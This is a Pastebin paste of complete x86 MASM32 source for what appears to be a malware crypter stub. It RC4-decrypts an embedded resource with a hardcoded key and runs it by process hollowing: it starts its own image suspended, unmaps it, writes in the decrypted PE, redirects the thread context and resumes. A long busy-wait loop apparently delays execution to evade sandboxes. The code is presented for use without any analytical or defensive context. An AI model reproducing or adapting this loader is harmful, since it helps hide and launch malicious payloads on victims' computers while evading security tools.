Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- .386
- .model flat, stdcall
- option casemap:none
- include \masm32\include\windows.inc
- include \masm32\include\kernel32.inc
- include \masm32\include\shell32.inc
- include \masm32\include\ntdll.inc
- includelib \masm32\lib\kernel32.lib
- includelib \masm32\lib\shell32.lib
- includelib \masm32\lib\ntdll.lib
- .data
- mPath byte 256 dup (0)
- password byte 'datpass', 0
- .data?
- hInstance dword ?
- loop_stopper dword ?
- ResInf dword ?
- hResourceSize dword ?
- rc4keytable db 256 dup (?)
- .code
- Rc4_setkey proc Pass:DWORD, LenPass:DWORD
- pushad
- mov eax, 0FFFEFDFCh
- mov ecx, 256/4
- Init_rc4keytable:
- mov dword ptr [rc4keytable+4*ecx-4], eax
- sub eax, 04040404h
- dec ecx
- jnz Init_rc4keytable
- xor eax, eax
- mov edi, Pass
- Key_return:
- xor ebx, ebx
- mov esi ,LenPass
- jmp New_key
- Key_loop:
- inc bl
- dec esi
- jz Key_return
- New_key:
- mov dl, byte ptr [rc4keytable+ecx]
- add al, byte ptr [edi+ebx]
- add al, dl
- mov dh, byte ptr [rc4keytable+eax]
- mov byte ptr [rc4keytable+ecx], dh
- mov byte ptr [rc4keytable+eax], dl
- inc cl
- jnz Key_loop
- popad
- ret
- Rc4_setkey endp
- Rc4_crypt proc iData:DWORD, LenData:DWORD
- pushad
- mov edi, LenData
- mov esi, iData
- test edi, edi
- jz Rc4_enc_exit
- xor eax, eax
- xor edx, edx
- xor ecx, ecx
- xor ebx, ebx
- Rc4_enc_loop:
- inc bl
- mov dl, byte ptr [rc4keytable+ebx]
- add al, dl
- mov cl, byte ptr [rc4keytable+eax]
- mov byte ptr [rc4keytable+ebx], cl
- mov byte ptr [rc4keytable+eax], dl
- add cl, dl
- mov cl, byte ptr [rc4keytable+ecx]
- xor byte ptr [esi], cl
- inc esi
- dec edi
- jnz Rc4_enc_loop
- xor eax, eax
- mov edi, offset rc4keytable
- mov ecx, 256/4
- cld
- rep stosd
- Rc4_enc_exit:
- popad
- ret
- Rc4_crypt endp
- ExtractFile proc
- local hResource:dword
- LOCAL sinfo: STARTUPINFO
- LOCAL pinfo: PROCESS_INFORMATION
- LOCAL base: dword
- LOCAL sec: ptr IMAGE_SECTION_HEADER
- LOCAL cnt: CONTEXT
- invoke GetModuleFileName, 0, offset mPath, 256
- invoke GetModuleHandle, 0
- mov hInstance, eax
- invoke FindResource, hInstance, 1212, RT_RCDATA
- .if eax != 0
- mov hResource, eax
- invoke SizeofResource, hInstance, hResource
- .if eax != 0
- mov hResourceSize, eax
- invoke LoadResource, hInstance, hResource
- .if eax != 0
- invoke LockResource, eax
- mov ResInf , eax
- invoke lstrlen,addr password
- invoke Rc4_setkey,addr password,eax
- invoke Rc4_crypt,ResInf,hResourceSize
- invoke RtlZeroMemory, addr sinfo, sizeof STARTUPINFO
- invoke CreateProcess, offset mPath, 0, 0, 0, 0, CREATE_SUSPENDED, 0, 0, addr sinfo, addr pinfo
- invoke RtlZeroMemory, addr cnt, sizeof CONTEXT
- mov cnt.ContextFlags, CONTEXT_INTEGER
- invoke GetThreadContext, pinfo.hThread, addr cnt
- invoke GetModuleHandle, 0
- invoke ZwUnmapViewOfSection, pinfo.hProcess, eax
- mov edi, ResInf
- add edi, IMAGE_DOS_HEADER.e_lfanew[edi]
- assume edi: ptr IMAGE_NT_HEADERS
- invoke VirtualAllocEx, pinfo.hProcess, [edi].OptionalHeader.ImageBase, [edi].OptionalHeader.SizeOfImage, MEM_COMMIT + MEM_RESERVE, PAGE_EXECUTE_READWRITE
- mov base, eax
- invoke WriteProcessMemory, pinfo.hProcess, base, ResInf , [edi].OptionalHeader.SizeOfHeaders, 0
- lea eax, [edi].OptionalHeader
- mov sec, eax
- movzx eax, [edi].FileHeader.SizeOfOptionalHeader
- add sec, eax
- xor eax, eax
- xor esi, esi
- xor ecx, ecx
- .while ( si < [edi].FileHeader.NumberOfSections )
- imul eax, esi, sizeof IMAGE_SECTION_HEADER
- add eax, sec
- mov ebx, base
- add ebx, IMAGE_SECTION_HEADER.VirtualAddress[eax]
- mov edx, ResInf
- add edx, IMAGE_SECTION_HEADER.PointerToRawData[eax]
- invoke WriteProcessMemory, pinfo.hProcess, ebx, edx, IMAGE_SECTION_HEADER.SizeOfRawData[eax],0
- inc esi
- .endw
- mov eax, base
- add eax, [edi].OptionalHeader.AddressOfEntryPoint
- mov cnt.regEax, eax
- invoke SetThreadContext, pinfo.hThread, addr cnt
- invoke ResumeThread, pinfo.hThread
- ret
- .endif
- .endif
- .endif
- ExtractFile endp
- _entrypoint:
- mov loop_stopper,500000000
- loop_start:
- mov eax,0
- push eax
- pop eax
- cmp loop_stopper, 0
- dec loop_stopper
- jg loop_start
- invoke ExtractFile
- invoke ExitProcess, 0
- end _entrypoint
Add Comment
Please, Sign In to add comment